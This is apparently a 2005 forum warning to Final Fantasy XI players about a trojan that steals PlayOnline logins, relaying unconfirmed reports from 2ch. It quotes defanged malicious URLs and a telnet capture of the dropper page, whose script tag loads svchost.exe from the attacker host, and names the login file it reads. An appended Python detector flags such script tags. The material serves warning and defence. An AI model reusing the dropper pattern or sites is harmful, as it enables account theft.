Please note that I can't read Japanese myself and the info was passed to me by a friend living in Japan. He said this is big news on the 2ch forums right now and 50 accounts have been confirmed to be stolen as of October 22nd. Since I can not read Japanese and am not a computer expert, I can not confirm this information. So I want to pass on this information collected by my friend for everyone to see. Please use your own judgement whether to believe it or not.
Here are the related threads from 2ch:
http://live19.2ch.net/test/read.cgi/ogame/1129895797/
http://archives.mmorpgplayer.com/nmz/data/live19.2ch.net/ogame/dat/1129895797.html
http://live19.2ch.net/test/read.cgi/ogame/1130087252/
http://news19.2ch.net/test/read.cgi/news/1130073619/
This trojan/spyware will run itself upon entering certain websites, which I listed below. This spyware will call for an HTML help file "icyfox.chm" and download svhost.exe, running on top of Windows' process of the same name.
This spyware is NOT detectable by:
Norton AntiVirus 2005
Norton Internet Security 2005
Virus Buster
The following are confirmed to be able to detect it:
AntiVir Win32:Mhtplo-31 > http://ringonoki.net/tool/antiv/antivir.html
Avast! TR/Copiet.B.1 > http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
These are some sites that are found to be spreading this trojan. DO NOT TRY TO ENTER THEM. I replaced all dots with slashes.
www-japan213-com = www-1102213-com = 211-100-26-182. It is a Chinese IP.
www-1102213-com/ff11help/money.htm
www-1102213-com/ff11help/svchost.exe
www-japan213-com/ff11929/ff11.asp
telnet www-1102213-com 80
Trying 211-100-26-182...
Connected to www-1102213-com.
Escape character is '^]'.
GET HTTP://www-1102213-com/ff11help/money.htm/ HTTP/1.0
HTTP/1.1 200 OK
...
<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www-1102213-com/ff11help/svchost.exe"></SCRIPT>
<SCRIPT language=JavaScript>function sopen()...
They believe it will read POL login information from C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
and store it in C:\gameff11.txt
Edited, Mon Oct 24 07:11:01 2005 by Jazalas
Edited, Thu Nov 10 10:29:58 2005 by Darkflame
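An added example, not part of the original post, of how a defender could flag pages built like the one quoted in the telnet session above: it parses HTML and reports every <script src> that points at an executable or HTML Help file (.exe, .chm) or is loaded from a host other than the page's own. The sample HTML and the host name dropper.example are constructed placeholders, not the sites named in the post.

```python
# Added example (not from the original post): flag <script src=...> references
# that point at executables or HTML Help files, as in the dropper page quoted above.
from html.parser import HTMLParser
from urllib.parse import urlparse

# File types that should never be loaded as a script; .exe and .chm are the
# two the post mentions (svchost.exe payload, icyfox.chm help file).
SUSPICIOUS_EXTENSIONS = (".exe", ".chm", ".hta", ".scr", ".pif", ".com")


class ScriptSrcAuditor(HTMLParser):
    """Collect every <script src> and decide whether it looks like a dropper."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # list of (src, reason)

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = {k.lower(): v for k, v in attrs}.get("src")
        if not src:
            return  # inline script, nothing external to check
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(SUSPICIOUS_EXTENSIONS):
            reasons.append("script src points at a non-script file type")
        if parsed.hostname and parsed.hostname.lower() != self.page_host:
            reasons.append("script loaded from a different host")
        if reasons:
            self.findings.append((src, "; ".join(reasons)))


def audit_html(html_text, page_host):
    """Return [(src, reason), ...] for suspicious <script src> tags in html_text."""
    auditor = ScriptSrcAuditor(page_host)
    auditor.feed(html_text)
    return auditor.findings


# Constructed sample mirroring the structure quoted in the post; host is a placeholder.
SAMPLE_HTML = """<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://dropper.example/ff11help/svchost.exe"></SCRIPT>
<SCRIPT language=JavaScript>function sopen(){}</SCRIPT>
<script src="/js/site.js"></script>
</BODY></HTML>"""

if __name__ == "__main__":
    for src, why in audit_html(SAMPLE_HTML, "dropper.example"):
        print(f"FLAG {src}: {why}")
```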